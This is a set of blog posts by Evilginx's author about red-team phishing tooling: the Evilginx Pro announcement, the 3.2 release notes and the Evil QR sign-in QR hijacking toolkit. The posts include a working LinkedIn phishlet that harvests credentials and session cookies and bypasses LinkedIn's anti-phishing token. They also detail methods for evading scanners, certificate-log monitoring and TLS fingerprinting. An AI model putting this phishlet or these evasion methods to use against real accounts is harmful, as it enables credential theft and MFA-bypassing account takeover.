โŒ

Normal view

There are new articles available, click to refresh the page.
Before yesterdayBREAKDEV

Evilginx Pro - The Future of Phishing

27 September 2023 at 11:08
Evilginx Pro - The Future of Phishing

I've teased the idea of Evilginx Pro long enough and I think it is finally time to make a proper reveal of what it exactly is.

Evilginx Pro will be a paid professional version of Evilginx, with extra features and added advanced reverse proxy anti-detection techniques, available only to BREAKDEV RED community members.

If you've not yet applied to the community or you did not receive the approval e-mail from the first round, you can apply again as Round #2 of registration is currently ongoing.

The Pro version is catered to professional red teamers and penetration testers, who want to see better results during phishing engagements and who want to make the job easier for themselves and have more time to focus on other aspects of the tasks at hand.

Without further ado, let's jump into the product presentation.

Features

The list of exclusive features available in the Pro version is not final. First of all, I wanted to outline the features I've already implemented, which are guaranteed to be included on day one:

Evilpuppet

Evilpuppet is an additional module running alongside Evilginx, responsible for managing a Chromium browser in the background, for various purposes.

I wanted to make a quick note here that, since there are already multiple ways to detect headless browsers, the Evilpuppet background browser does not launch in headless mode, to prevent unnecessary detections, while still running with a hidden interface.

The main reason why Evilpuppet was created, was due to new reverse proxy phishing detections, introduced on popular websites.

The module serves two purposes:

Secret Token Extraction

More websites begin to implement extensive JavaScript obfuscation with the generation of what I call - "secret tokens". The secret token, in general, is an encrypted buffer holding telemetry data gathered from the client's web browser. The telemetry data often holds the URL of the visited website, which in the case of the phishing website, would hold the name of the attacker's phishing domain.

The secret token value is often transmitted as a hidden POST parameter. Once retrieved by the server, the token is decrypted and its content is analyzed, in search for anomalies, which could indicate that sign-in originated from a reverse proxy server, hosted on a different domain than the legitimate website.

If you're interested in learning how secret tokens are generated and how they are used to protect users from reverse proxy phishing, you can watch my x33fcon talk where I explained how to properly implement such protections.

The students of my Evilginx Mastery course can also learn how to evade secret token protection within the private Training Lab.

Sometimes reverse engineering the JavaScript responsible for gathering telemetry and generating the secret token's value, then hotpatching it, is simply not possible.

This is where Evilpuppet comes in.

Evilpuppet runs as a Node.js application, which controls a Chromium browser, automated through Puppeteer. The process of bypassing the secret token protection can be described as follows:

  • When a phished user begins the login process, in which a secret token is generated, Evilpuppet will spawn a browser in the background and open the legitimate website's sign-in page.
  • In the background session, Evilpuppet will enter the credentials supplied by the phished user and initiate the sign-in process.
  • Once the secret token is generated and embedded within the transmitted HTTP packet, Evilpuppet will extract its value and send it back to Evilginx.
  • The secret token generated within the reverse proxy phishing session is then replaced with the secret token extracted from the Evilpuppet background session.

You may be thinking how is this possible? Why isn't the secret token tied to the specific sign-in session to prevent the attacker from re-using secret tokens generated in different sessions?

Unfortunately, what makes it possible is the fact that HTTP communication is stateless by design. You can emulate the state by including specific session tokens as cookies or authorization headers, but this can all be emulated by the attacker. If we could tie a sign-in session to a TLS handshake, for example, this would be a different story. There was once a lot of buzz about the concept of Token Binding, but I believe the idea did not take off.

If you've recently tried using Evilginx to phish LinkedIn, you may have noticed the phished account is locked out immediately when a reverse proxy phishing attack succeeds. This happens, because Microsoft implemented reverse proxy phishing session detection, through the generation of a secret token.

You can see the secret token, transmitted with the POST login request as a hidden apfc parameter.

Evilginx Pro - The Future of Phishing

Evilginx Pro with Evilpuppet will capture the value of apfc parameter in the background browser session and inject it into a reverse proxy session, effectively circumventing the protection and making the LinkedIn server think the sign-in happened on a legitimate website.

Here is a short video of Evilginx Pro successfully phishing a LinkedIn user, while extracting a secret token with the background browser. As a bonus enjoy some extra Cyberpunk music I made!

NOTE: The background Chromium browser will be running in the background, on the Evilginx server and will not be visible. It is only visible in the video for demonstration purposes.

๐ŸŽฌPhishing LinkedIn and bypassing MFA demo created for the upcoming Evilginx Pro post ๐Ÿ”ฅ

๐Ÿ’กEvilginx uses a background browser to capture the secret token from legitimate website and inject it back into the reverse proxy phishing session.

P.S. Enjoy that Cyberpunk tune I made ๐ŸŽต pic.twitter.com/rkbOmVSdeb

โ€” Kuba Gretzky (@mrgretzky) September 26, 2023

To learn more about how Evilpuppet can be automated with Evilginx Pro, you can look into the LinkedIn phishlet, which was used in the demo video:

min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true, auto_filter: true}
sub_filters:
  - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'www.linkedin.com', search: '<\/head>', replace: '<style>#artdeco-global-alert-container {display: none !important;} .alternate-signin-container {display: none !important;}</style></head>', mimes: ['text/html']}
auth_tokens:
  - domain: '.www.linkedin.com'
    keys: ['li_at']
credentials:
  username:
    key: 'session_key'
    search: '(.*)'
    type: 'post'
  password:
    key: 'session_password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'www.linkedin.com'
  path: '/login'
js_inject:
  - trigger_domains: ["www.linkedin.com"]
    trigger_paths: ["/login"]
    trigger_params: ["email"]
    script: |
      function lp(){
        var email = document.querySelector("#username");
        var password = document.querySelector("#password");
        if (email != null && password != null) {
          email.value = "{email}";
          password.focus();
          return;
        }
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);
evilpuppet:
  triggers:
    - domains: ['www.linkedin.com']
      paths: ['/checkpoint/lg/login-submit']
      token: 'apfc'
      open_url: 'https://www.linkedin.com/login'
      actions:
        - selector: '#username'
          value: '{username}'
          enter: false
          click: false
          post_wait: 500
        - selector: '#password'
          value: '{password}'
          enter: false
          click: false
          post_wait: 500
        - selector: 'button[type=submit]'
          click: true
          post_wait: 1000
  interceptors:
    - token: 'apfc'
      url_re: '/checkpoint/lg/login-submit'
      post_re: 'apfc=([^&]*)'
      abort: true

Evilpuppet support is already included in the official documentation, so please check that out if you want to learn how the evilpuppet section of a phishlet works.

For comparison, you can use the same phishlet with the public version of Evilginx and observe how the account will be locked when phished successfully when there is no Evilpuppet to help with injecting the legitimate apfc secret token.

Post-Phishing Automation

This feature is not yet completed, but the end goal is to allow Evilpuppet to use the captured session tokens and log into the phished service on behalf of the phished user.

Once logged in, it could be instrumented to perform specific actions on the phished user's account to change account settings or exfiltrate data.

The idea is to create a full-blown post-phishing automation framework similar to what Necrobrowser does in the Muraena project.

Wildcard TLS Certificates

Evilginx Pro is officially supporting the automatic retrieval and renewal of wildcard TLS certificates from LetsEncrypt.

One of the most annoying aspects of using Evilginx with LetsEncrypt was that whenever Evilginx requested the TLS certificates for all of the phishing subdomains, the TLS certificate for a given phishing domain would immediately be published within the Certificate Transparency Log.

Once the certificate lands in the log, dozens of automated scanners will begin scanning the domains attached to generated TLS certificates, looking for malicious intent. You could observe this happening in the Evilginx terminal with multiple unauthorized requests popping up to your phishing domain, right after the TLS certificate, through LetsEncrypt was issued.

Wildcard certificates do not carry the same problem. Even though wildcard certificates will land in the same Certificate Transparency Log, the automated scanners will have no idea what domains to scan, because the Common Name attached to the wildcard TLS certificate would look like *.baddomain.com and any subdomain could be used.

Using Evilginx Pro with wildcard certificates will prevent your phishing domains from being scanned when TLS certificates from LetsEncrypt are issued, allowing your phishing campaigns to remain undetected much longer.

JA3 Fingerprinting Evasion

Methods to detect reverse proxy phishing have been similar to methods to detect web scraping bots. Very often scraper bots would be written in a specific programming language like Java, Go or Python. Each of these languages implements an HTTP library, which holds specific fingerprintable characteristics.

One such fingerprinting method is called JA3 and it is more often implemented by major companies.

The idea is to detect the specific combination of TLS ciphers supported by the HTTP client willing to connect to the server. The list of TLS ciphers is exchanged during the TLS handshake. As an example, Google Chrome will have a different list of supported TLS ciphers than the HTTP library used in Go or Python.

Evilginx Pro will make sure to always imitate a list of TLS ciphers of popular web browsers, to evade any form of JA3 fingerprinting and make its connections look as close to casual web browser traffic as possible.

Daemonization and Multi-User Collaboration

Currently, Evilginx is both a client and a server, in one application. This makes Evilginx fairly easy to use, but it also introduces a set of problems, making it harder to deploy and manage at scale.

The only way to run Evilginx in the background, right now, is to execute it within a tmux or screen session. This complicates the process of launching Evilginx on boot, as the launch script needs to manage tmux sessions as well. ย It also means that every instance of Evilginx needs to be controlled over an SSH connection, which is often not ideal.

My plan with Evilginx Pro is to make the server fully daemonized and allow it to be controlled through exposed admin API by Evilginx Pro client applications. Both the Evilginx server and Evilpuppet Node.js application would be running as daemons, awaiting connections from Evilginx clients.

Evilginx Pro server would expose a full API, accessible over a standard HTTPS connection on the default 443 port. API access would be protected with an authorization token to identify the Evilginx admin user.

This new client-server architecture would allow a multi-user collaboration across multiple Evilginx Pro instances. Every user with a valid Evilginx Pro license would be able to interact with any Evilginx Pro server instance, set up with the same license.

Evilginx Pro clients will look and feel the same way as the current Evilginx terminal UI. The only difference with Evilginx Pro will be that you'd be using one terminal to control multiple remote server instances. The introduction of a full-blown API to control Evilginx instances will also allow automating Evilginx server setup and, one day, it may even be possible to develop a web UI for Evilginx.

Licensing System

Important to note here is the fact that it will be required to have a valid BREAKDEV RED community account, in order to be eligible to obtain an Evilginx Pro license. This means that only people qualified to join the community will be allowed to purchase Evilginx Pro licenses. This is to limit the misuse of Evilginx Pro's extra offensive capabilities and make sure that only vetted personnel are using the Pro version.

Due to the separation of a server and a client in Evilginx Pro, communication with the BREAKDEV licensing server will only take place on the side of Evilginx client applications. Since Evilginx server instances are critical in terms of operational security during red team engagements or phishing simulations, they will not make any unnecessary outgoing connections to licensing servers. The only established connections will be the ones required for reverse proxy sessions to work properly.

Multiple Base Domains Support

At the moment, Evilginx allows the use of only a single base domain, configured globally, which is used by every activated phishlet. If your configured base domain is fake.com, every lure URL you generate, even for different phishlets, will use a hostname ending with fake.com.

Evilginx Pro allows more flexibility with the configuration of multiple base domains. These can later be assigned to individual phishlets or individual lures.

Phishlets will be assigned the last used domain from the list, which will be then automatically used for the generation of new lures, but you can also override the selected domain and pick a different one from the list of supported domains for each lure separately.

No Detectable Artifacts

I made sure to deprive Evilginx Pro of any identifiable artifacts and I do not only mean the removal of the infamous X-Evilginx header.

Evilginx Pro is much harder to identify by automated scanners and HTTP servers it connects to.

Server Stealth Overhaul

You will now have an option for how to handle unauthorized requests. At the moment, unauthorized requests would redirect the visitor to a different URL, through the injection of Location header in the HTTP response or throw a 403 Forbidden HTTP error.

Evilginx Pro allows you to either use the default method or:

  • Display the contents of another website under the same domain, using a reverse proxy functionality similar to proxy_pass in Nginx.
  • Respond with custom HTML content stored in the local directory.

HTML and JavaScript Obfuscation

Evilginx Pro implements much smarter techniques for evading phishing page detection.

All of the JavaScript or HTML content, injected through js_inject or hosted through lure redirectors will be now delivered dynamically obfuscated, making it much harder for signature detections to determine the hosted content as malicious.

Some of you have had a lot of success hosting your phishing pages behind additional obfuscation layers like Cloudflare. Some research has also been published describing how effective content obfuscation is, to protect phishing pages.

It makes sense that HTML and JavaScript obfuscation should be natively supported by Evilginx, without having to use external services to overcomplicate your infrastructure setup.

Auto-Deploy Scripts

Evilginx Pro comes with easy-to-use bash scripts to easily deploy Evilginx to external servers.

You can deploy Evilginx to the remote server as easily as by running a single command:

SSH_KEY_FILE=~/keys/ssh.key SSH_USER=admin ./deploy.sh 1.2.3.4

You can learn more about the automatic deployment script here. The usage may slightly change in the final product, but it will always remain as easy as using a single command.

Closed Source

I wanted to make note here that Evilginx Pro will not be released as open-source. This decision comes from the fact that I want to lower the risk of possible source code leaks, which could lead to unauthorized use of the tool.

I expect to make exceptions for companies, which need to perform due diligence, before using the tool, to have guarantees that the tool securely stores and manages critical operational data, to protect their own customers.

Final Thoughts

I expect Evilginx Pro to be released in Q4 2023 or Q1 2024, with the license price tag of 1200-1400 EUR per seat, billed annually. The price is not final and will depend heavily on product demand. The higher the demand, the lower the price will be.

There will be no limits to how many Evilginx Pro servers you deploy. The license will be required only by the Evilginx Pro client application, assigned to a specific user, from which it will be possible to communicate with all deployed servers. In short, every red teamer will require one named license to use Evilginx Pro to be able to connect to an unlimited number of Evilginx Pro server instances, created for the same license.

Everyone who has been accepted into the BREAKDEV RED community will soon receive a link to the form with several questions, through which I'll be gathering feedback on Evilginx Pro.

Thank you in advance if you spend the time to fill it out! Your answers will be used to make Evilginx Pro a better product.

If you haven't yet applied to become a member of the BREAKDEV RED community, round 2 of registrations is up! Please apply here.

Wish you all the best and as always expect updates to show up on my Twitter @mrgretzky.

BREAKDEV RED - Red Team Community

30 August 2023 at 11:59
BREAKDEV RED - Red Team Community

Today I want to announce my plan for creating a closed community for professional red teamers, working in red team companies, who perform phishing engagements as part of their job.

Read more about it below, but if you're already ready to sign up, here is the button, which will take you to the registration form:

Red Teams United

My idea is to create a vetted Discord community, oriented around using Evilginx and ethical phishing, where everyone can safely share their phishing tips and tricks without having to worry about such information being misused by malicious parties.

I plan to launch a community repository for Evilginx phishlets, which will be maintained by me and other red teamers from the same trusted BREAKDEV RED community. Every community member will be granted free access to the repository and everyone will be able to contribute their own phishlets.

Additionally, all community members will be granted the ability to purchase licenses for Evilginx Pro as soon as it lands. The reveal of all the upcoming features will happen in the upcoming weeks. I expect Evilginx Pro to become a game-changer in professional phishing, solving a lot of issues around detection and adding the ability to bypass the latest reverse proxy phishing mitigations.

One of my main concerns is for Evilginx Pro to not fall into the hands of wrong-doers, which is the number one reason why I want to establish the trusted community in the first place.

Benefits for BREAKDEV RED members:

  • FREE access to the private Evilginx phishlets repository on GitHub, maintained by me and other Evilginx power users.
  • FREE access to the private BREAKDEV RED community on Discord, where you can interact with fellow red teamers, who went through the same vetting process as you did.
  • (OPTIONAL) Ability to purchase licenses for Evilginx Pro when it comes out sometime later this year or early 2024.

I have already confirmed that Discord communities can be highly beneficial for brainstorming and for Evilginx development. One of the great examples was when @JackButton_ shared how he implemented his own idea of signature base evasion and automated scan preventions using CloudFlare, on Evilginx Mastery Discord.

How do I sign up?

First of all, here is a list of requirements you need to fulfill, in order to be granted membership:

Registration requirements:

  • You're an employee or an owner of a cybersecurity company offering legal penetration testing services, with a focus on phishing simulations.
  • The provided contact e-mail should be hosted on the company domain. Sorry, no free domains (Gmail, Protonmail etc.), since those carry the risks of impersonation.
  • Your company should have a public website with outlined services provided in the area of cybersecurity. Once your status is approved, I will send you an email to the address you provided, with a final confirmation request.

If by any chance you do not use company emails hosted on the company domain, please explain in the "Comments" section of the form and we will work something out.

If you're ready to sign up, clicking this button will lead you to the registration form:

FAQ

What is Evilginx Pro?

It is a privately maintained version of Evilginx which employs:

  • Evasion of widely employed phishing detection mechanisms.
  • Extra features like extraction of secret tokens, using an entirely new Evilpuppet module, responsible for interfacing Evilginx with a background browser.
  • Reverse proxy support for most popular services (including Google, LinkedIn and more).

I will release a blog post soon, going into detail on what exactly the Pro version is about.

Update: The blog post is out.

What is the registration form about?

Since I do not want any of the community benefits to be abused or misused, I want to offer them EXCLUSIVELY to legitimate cybersecurity companies, offering red teaming and/or penetration testing services.

Your answers allow me to learn more about your company and let me make a decision whether to put it on the list of trusted companies, interested in becoming Evilginx power users.

Evilginx 3.2 - Swimming With The Phishes

24 August 2023 at 10:02
Evilginx 3.2 - Swimming With The Phishes

Welcome back!

I've recently managed to find some free time to work on reverse proxy support for the latest Google updates and in the process I've made several additions to the Evilginx code base, which I think some of you will find useful.

To start, I wanted to give a big shoutout to Daniel (@dunderhay) for publishing a great post on how he used Evilginx to phish the Microsoft 365 ADFS environment and how he even made his modifications to succeed!

Evilginx is getting more love this year than in the last couple of years and I'm very happy about it. I have big plans for Evilginx, which I will announce soon, but first I wanted to give you a rundown of what the latest 3.2 update consists of.

I will start with the most significant changes.

Dynamic Redirection on Session Capture

One of the behaviours, that annoyed me when using Evilginx, was the fact that sometimes it was not possible to immediately redirect the phished user to the configured redirect_url, once all session tokens were captured. Evilginx could only redirect the browser once the targeted website attempted to navigate to a different page, on its own.

It made redirects not work on single-page applications. I learned it first-hand during the development of the Training Lab for my Evilginx Mastery course. The main page of the lab changes its contents dynamically and never navigates to a different URL. This means that once session tokens are captured by Evilginx, the tool is unable to redirect the user to redirect_url address.

In the 3.2 update, I've managed to solve the problem with injected JavaScript sending out HTTP long polling requests on every proxied page, to retrieve session capture status directly from the Evilginx proxy server in real-time. Evilginx will inject its own JavaScript code on every HTML page load, which will be responsible for querying https://<phish_domain>/s/<phish_session_id> infinitely. Evilginx proxy server will respond with a JSON structure, containing the redirect_url value only when the session is successfully captured. Otherwise, the connection will time out after 30 seconds and will be retried afterwards. Long polling allows Evilginx to let the injected script know that the session was captured immediately when it happens.

The script will then change the window.location URL to the retrieved redirect_url value, redirecting the user to a preconfigured page address. Redirection should now work great within Evilginx Mastery Training Lab.

Instead of HTTP long polling, I could've used WebSockets, but I wanted to keep it simple without the need to rely on external libraries, which would need to be injected as well.

Temporary Lure Pausing

Evilginx 3.2 - Swimming With The Phishes

Imagine a situation - you're on a phishing engagement and finally get to send out your phishing lures. Once the emails start arriving at the target inbox, the mailbox server opens them one by one and scans the HTML content of every phishing URL. The mail server then determines emails as phishing and they are sent to quarantine.

There are many ways to prevent automated scanners from seeing the content of your phishing pages, but the most straightforward method would be to simply hide your phishing pages for a brief moment, right before you send out the emails. Enough to hide their content from automated scanners, but not from the targeted user.

Now you can easily hide your lures from prying eyes by pausing them for a specific time duration with:

lures pause <id> <time_duration>

The best part is that you don't have to worry about unpausing a lure manually. Once the pause period expires, the lure with become active again and you will get a notification about it in the terminal. The pause state also persists between Evilginx restarts.

Interception of HTTP Requests

I found out that sometimes it would be useful to be able to block some of the proxied requests or have them return custom responses, without the proxied requests ever reaching the destination server.

Now you can detect specific requests within the new intercept section in your phishlets, which will match specific URL paths on domains within your proxy_hosts list. Once the request matches your filters, you will be able to detour the request and return your response with a custom HTTP status code.

intercept:
  - {domain: 'www.linkedin.com', path: '^\/report_error$', http_status: 200, body: '{"error":0}'', mime: "application/json"}
  - {domain: 'app.linkedin.com', path: '^\/api\/v1\/log\/.*', http_status: 404}

In the example above, any request to https://www.linkedin.com/report_error will be intercepted and will return HTTP status 200 with response body {"error":0} and MIME type application/json.

The second entry will make sure that all requests to https://app.linkedin.com/api/v1/log/<whatever> will return 404 Not Found HTTP response.

Redirect URL Added to Phishlets

Sometimes for the phishlet to work properly and to not interrupt the phished user's experience, it needs to redirect the user's browser right after session tokens are successfully captured. For now, the redirect would happen only if redirect_url was specified for the lure, used with the phishing engagement.

At times, it is important to have a default redirect_url specified, especially if we want the user to be redirected to the home page of the phished website, by design. Sometimes the redirection to the home page will happen automatically, but sometimes it needs to be enforced.

From this Evilginx version, you can set a default redirect_url in the phishlet you are creating to make sure the phished user is redirected, once session tokens are captured, even if redirect_url has not been set up for the given lure.

Unauthorized Request Redirects Per Phishlet

First of all, I've changed the name redirect_url from global config to unauth_url, to better illustrate its purpose and so it doesn't get confused with redirect_url set up in phishlets or lures.

IMPORTANT! Keep note that the URL you set for unauthorized request redirects may reset itself after the update, due to the name change.

Unauthorized URL or unauth_url holds the URL address where visitors will be redirected if they open any URL on the phishing domain, which doesn't correspond to any valid URL or if the lure is currently paused.

So far, it was possible to set up unauth_url globally, which would provide the same URL to redirect to for all active phishlets. With 3.2 you can now override the global unauth_url by specifying a value for each phishlet with:

phishlets unauth_url <phishlet> <url>

This feature was suggested by @0x_aalex who was also kind enough to submit a PR with his implementation. Thank you for that!

Tweaks and Fixes

Additionally to several new features, Evilginx has also received some QoL tweaks and fixes, which should improve the overall phishing performance.

Disabled caching of proxied content by web browsers

Sometimes it was especially frustrating to test the sub_filters of your phishlets because your web browser cached the content of your previous modification. Every time you made small changes and had to retest, it was required to clear the browser cache.

Starting from the 3.2 update, Evilginx will prevent web browsers from caching HTML, JavaScript and JSON content by injecting Cache-Control: no-cache, no-store HTTP header in proxied responses.

This should also make working with js_inject much more convenient.

JavaScript injected through external references

Normally when your phishlets inject JavaScript, through js_inject functionality, Evilginx would drop the whole script into the content of the HTML page within <script>...</script> tags. This approach was kind of messy, so I figured out a way to inject multiple scripts as external references, like this:

<script type="application/javascript" src="/s/48d378a85f0867ef16bf0fd28deda0d4b30139c54805033803e7fdcbc31f293c/2628b4fe94aa35effbe26d64ed6decd00c9d26fb53aa0dfb57836055a27e38cf.js"></script>
<script type="application/javascript" src="/s/48d378a85f0867ef16bf0fd28deda0d4b30139c54805033803e7fdcbc31f293c.js"></script>

Requests to download external JavaScript resources will be intercepted by Evilginx proxy and the response will be delivered from Evilginx directly, without ever being forwarded to the destination website.

This approach should make it possible to introduce dynamic JS obfuscation, in the future. (Stay tuned!)

Changelog

Here is the full changelog for Evilginx 3.2:

  • Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.
  • Feature: Lures can now be paused for a fixed time duration with lures pause <id>. Useful when you want to briefly redirect your lure URL when you know sandboxes will try to scan them.
  • Feature: Added phishlet ability to intercept HTTP requests and return custom responses via a new intercept section.
  • Feature: Added a new optional redirect_url value for phishlet config, which can hold a default redirect URL, to redirect to, once tokens are successfully captured. redirect_url set for the specific lure will override this value.
  • Feature: You can now override globally set unauthorized redirect URL per phishlet with phishlet unauth_url <phishlet> <url>.
  • Fixed: Disabled caching for HTML and Javascript content to make on-the-fly proxied content replacements and injections more reliable.
  • Fixed: Blocked requests will now redirect using javascript, instead of HTTP location header.
  • Fixed: Improved JS injection by adding <script src"..."> references into HTML pages, instead of dumping the whole script there.
  • Fixed: Changed redirect_url to unauth_url in global config to avoid confusion.
  • Fixed: Fixed HTTP status code response for Javascript redirects.
  • Fixed: Javascript redirects now happen on text/html pages with valid HTML content.
  • Fixed: Removed ua_filter column from the lures list view. It is still viewable in lure detailed view.

Closing Thoughts

Hope you enjoy this update and there is more to come for Evilginx!

If you are interested in mastering the Evilginx phishing framework, consider checking out my Evilginx Mastery course:

In the upcoming weeks, I want to show off a sneak peek of Evilginx Pro and outline all of its extra features. Evilginx Pro will be a paid product I want to distribute only to vetted red teaming companies around the world.

I will post more details when I'm ready!

If you are interested in how to protect against reverse proxy phishing, do check out the talk I gave in May at x33fcon cybersecurity conference from this year:

For now, stay tuned and you can always follow me on Twitter @mrgretzky.

Evil QR - Phishing With QR Codes

5 July 2023 at 14:31
Evil QR - Phishing With QR Codes

Today I'm publishing the research I started to work on last year, but I was too busy with the Evilginx Mastery course, to publish it, at the time.

If you want a quick TL;DR rundown of what this blog post is about, check out the demo video I prepared:

Background

In recent years, I've noticed that more and more web applications begin to offer a new way to sign in - through QR code scanning. This method is especially convenient if you have a mobile app, on your phone, corresponding to the web application you are trying to sign into, in your web browser.

Here are the most popular websites, you can sign into, in any web browser, by scanning a QR code within the mobile application.

Evil QR - Phishing With QR Codes
Discord
Evil QR - Phishing With QR Codes
Telegram
Evil QR - Phishing With QR Codes
Whatsapp
Evil QR - Phishing With QR Codes
Steam
Evil QR - Phishing With QR Codes
TikTok
Evil QR - Phishing With QR Codes
Binance

To sign in, you open the mobile application, navigate to "Scan QR code", usually residing somewhere within your profile settings, in the mobile application, and scan the QR with your phone camera.

The QR code, displayed on every sign-in page, is nothing more than a dynamically generated session token, which you can authorize with your mobile application, to pair it with your account.

Try to scan any of these QR codes with your phone's camera and you'll see the code translates into a unique string, usually presented in URL format. Here are several examples:

Discord:

https://discord.com/ra/GLt61XsN_fuakToqeSMV25pd3G-uwSbdScI1Zc9iwT8

Whatsapp:

2@o7Ugs+XwUVXgG2f8stGluhiItwCxbZJNLkpkeKEhz65GmPh6+/N1lp3fXpaSjxeARrE2JGXi3ikIFA==,it98cjNOA3qvp4i/TidKTeWZTrGkFUTnqsOzPPxFEzI=,AMV+jQ0gSnoFFKbuYzKdrDSPT7BVZ4R5iFxIGEbCqQI=,nVAlyqnDJiYfW/S1LzZoaVNsDm+pNaB1mGm8pGC0+/E=,1

Steam:

https://s.team/q/1/1711614348354244891

TikTok:

https://www.tiktok.com/t/ZGJXCraU8/

Binance:

https://www.binance.com/en/qr/93bd2ead7e504488bda81bf50deab7e8

Now let's imagine if there is any potential way, attackers could convince users to scan the QR code with the session token they control.

Meet Evil QR Phishing aka QRLJacking

One day you receive an email, telling you that you've been granted exclusive access to a private Discord server, where highly valuable information will be shared, among the participants. All you need to do is open the attached link and scan the QR code with your Discord application.

You click the link and the following website shows up in your web browser:

Evil QR - Phishing With QR Codes
Phishing page deployed and hosted by the attacker

Since you are pretty excited to join, you open your Discord application and scan the QR code, showing up on the screen of your PC. Discord asks you to confirm if you want to sign in, using the scanned QR code. You think that it makes sense that you need to be signed in to join the Discord server, so you agree without hesitation.

Once you approve the login attempt, the website redirects you to the Discord server page. You lose interest and go back to your other activities. All this without realizing, you've just given the attacker full access to your account.

What happened?

Here is the step-by-step process of what the attacker did to pull off this phishing attack, using the Evil QR toolkit.

  1. The attacker opens the official Discord login page within their web browser to generate the sign-in QR code.
  2. Using the Evil QR browser extension, the attacker is able to extract the sign-in QR code from the login page and upload it to the Evil QR server, where the phishing page is hosted.
  3. The phishing page, hosted by the attacker, dynamically displays the most recent sign-in QR code controlled by the attacker.

Once the target successfully scans the QR code, the attacker takes over the phished account.

The concept of phishing users with sign-in QR codes is not new and it has been broadly documented by Mohamed Abdelbasset Elnouby (@SymbianSyMoh) from Seekurity in 2016! I highly recommend you read this post as it covers a lot of information about the potential attack vectors, which could be used to pull off such attacks.

The technique was later officially recognized as QRLJacking and @SymbianSyMoh also released a QRLJacker tool in 2020 to demonstrate how such attacks can be executed. Evil QR idea is just a spin-off of the same idea.

Evil QR Toolkit

To demonstrate this interesting phishing technique, I've developed a set of proof-of-concept tools for demonstration purposes.

You can find the open-sourced Evil QR toolkit on my GitHub if you're interested in trying it out yourself.

As you can see below, the Evil QR attack can be customized using personalized phishing pre-text, with dynamic updates, for every website separately. Evil QR browser extension can detect and extract QR codes, within websites, no matter how they are rendered.

The extension supports extracting QR codes rendered as CANVAS, IMG, SVG or even DIV (by taking a screenshot with html2canvas library).

Evil QR - Phishing With QR Codes

Evil QR Server

The server is developed in GO and its main purpose is to expose REST API for the browser extension and run an HTTP server to host the phishing page.

It awaits authenticated communication from the browser extension including QR code image with metadata in JSON format on /qrcode/[qr_uuid] endpoint:

{
    "id": "11111111-1111-1111-1111-111111111111",
    "source": "data:image/png;base64,iVBORw0K...",
    "host": "discord.com"
}

The retrieved QR code is then stored and is available for retrieval by the JavaScript, running on the phishing page. The phishing page is using HTTP Long Polling to be able to retrieve QR code updates with minimal delays, without having to use Websockets.

The phishing page automatically detects which hostname the QR code was retrieved from and can dynamically adjust its CSS and text content to change the phishing pre-text, for social engineering purposes.

Evil QR Browser Extension

Evil QR - Phishing With QR Codes

The extension is used solely by the attacker and it needs to be enabled on the sign-in page of the web application, the target is phished for. It will automatically find the QR code image and detect if it changes. Once it changes, it will upload the updated image to the Evil QR server.

One of the most important characteristics of session tokens represented by sign-in QR codes, is that the tokens are short-lived by design. Every token is made to expire approximately after 30 seconds, which drastically shortens the time frame of the token's validity. Once the token expires, the website regenerates it and updates the displayed QR code, on the sign-in page.

If the sign-in session tokens did not expire, the attackers would hypothetically be able to print out the QR codes on a physical piece of paper and send them as phishing leaflets to potential victims, since the tokens would never expire.

Some websites will stop updating QR codes, after a certain period of inactivity, to save bandwidth. When this happens, they will usually display a "Retry" button of some sort, which the extension can automatically detect and click on, to not interrupt the process of updating QR codes.

The extension can also detect the presence of a specific DOM object, which will show up only when the attacker is signed in after the phishing attempt is successful. It will then send an update to the Evil QR server with authorized: "true" parameter, allowing the phishing page to decide on how to proceed.

How serious is this?

In my personal opinion - not that serious. For the QRLJacking phishing attack to be successful, it requires a lot of prerequisites to be met prior to the attack taking place. Nevertheless, it was a very fun project to work on.

The classic phishing attacks, focused on capturing credentials and session tokens to bypass multi-factor authentication, are still much more dangerous than this one and they can be executed on a much larger scale using a tool like Evilginx for example.

I think the most realistic scenario of how QRLJacking phishing could be pulled off, would be to set up a phishing page with a QR code on display using an external device, deployed in public, like a tablet or TV screen. Once one person successfully signs in, by scanning a QR code, the attacker's Evil QR setup would save the captured session for later and reload the new sign-in page to generate a new QR code to phish another user.

That could in theory make it possible to phish a larger number of users, one at a time. I don't think QRLJacking phishing is a viable technique when sending phishing links via e-mail or other mediums. These days most people read incoming messages on their mobile phones and once the phishing page with a QR code shows up on their phone's screen, it is impossible to use the same phone's camera to scan it.

To summarize, here is a list of all pros and cons of executing this phishing attack technique, I could think of:

Pros:

  • No need for the target to enter their username and password.
  • Could be potentially pulled off in public areas, having an external device displaying a phishing QR code, on display.

Cons:

  • Target needs to have the mobile app pre-installed for the given service.
  • Attacks are hard to pull off, on a wider scale, since there has to be a separate QR code generated for every target.
  • Usually pretty hard to find the setting to scan QR codes within mobile applications, involving multiple clicks, with every click lowering the chance of a successful social engineering attempt.
  • If a phishing page is opened on a mobile phone, there is no way for the target to scan the QR code with the same mobile phone.

Closing thoughts

I decided not to implement this attack vector into Evilginx phishing framework, since Evilginx is already powerful on its own.

While sign-in QR codes displayed on phishing pages, reverse proxied by Evilginx, will not let you sign in by scanning them, due to hostname mismatch, it is still possible to patch the JavaScript code, which generates them, to make them work on phishing pages.

If you're interested in learning more about reverse proxy phishing to bypass MFA, check out my Evilginx Mastery video course, which will teach you everything you need to know to perform successful red team phishing engagements.

Till next time!

Evilginx 3.0 + Evilginx Mastery

10 May 2023 at 09:16
Evilginx 3.0 + Evilginx Mastery

This post has been long coming and I'm glad to finally be able to make it happen!

Today I'm finally releasing Evilginx 3.0, together with Evilginx Mastery online course, into which I've poured everything I know about Evilginx and how to use it in the most effective manner.

Evilginx hasn't seen any updates for nearly two and a half years. That's why it was a great surprise to me to hear, that even though I haven't released any updates, a lot of red teamers still use this tool for phishing simulations with many successes. I've been amazed to come across some great posts about Evilginx, like the ones by Jan Bakker, Jeffrey Appel or Pepe Berba.

Talking to people in the industry motivated me to give Evilginx a quality of life refresher, in order to build stronger foundations for future updates. It's been nearly 6 years, since I've released the first version of Evilginx, which was nothing more than a LUA script for custom version of nginx. Back then I couldn't have foreseen such great reception, the tool would receive, over the years.

